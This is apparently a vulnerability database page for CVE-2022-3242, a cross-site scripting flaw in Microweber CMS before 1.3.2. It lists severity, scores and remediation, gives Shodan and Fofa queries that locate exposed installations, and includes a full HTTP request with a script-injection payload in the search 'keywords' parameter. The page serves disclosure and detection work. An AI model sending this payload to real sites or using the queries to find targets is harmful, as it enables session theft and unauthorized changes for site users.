🔙 목록으로 돌아가기

CVE-2022-3242: Microweber <1.3.2 - Cross-Site Scripting

TitleMicroweber <1.3.2 - Cross-Site Scripting
Authorr3Y3r53
SeverityMedium
ImpactAttackers can craft malicious search URLs with JavaScript in the keywords parameter that executes when users access search results, potentially stealing session cookies, admin credentials, or performing unauthorized content modifications in Microweber CMS.
RemediationUpdate Microweber to version 1.3.2 or later that properly sanitizes and encodes the keywords parameter in search.php.
CVSS Score6.1
EPSS Score0.15577
CVE IDCVE-2022-3242
CWE IDCWE-79,CWE-94
Shodan Queryhttp.favicon.hash:780351152http.html:"microweber"
Fofa Querybody="microweber"icon_hash=780351152
Tags cve cve2022 huntr xss microweber vuln

🔍 Vulnerability Description

Code Injection in on search.php?keywords= GitHub repository microweber/microweber prior to 1.3.2.

🌐 HTTP Request

GET /search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-3242.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-3242.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A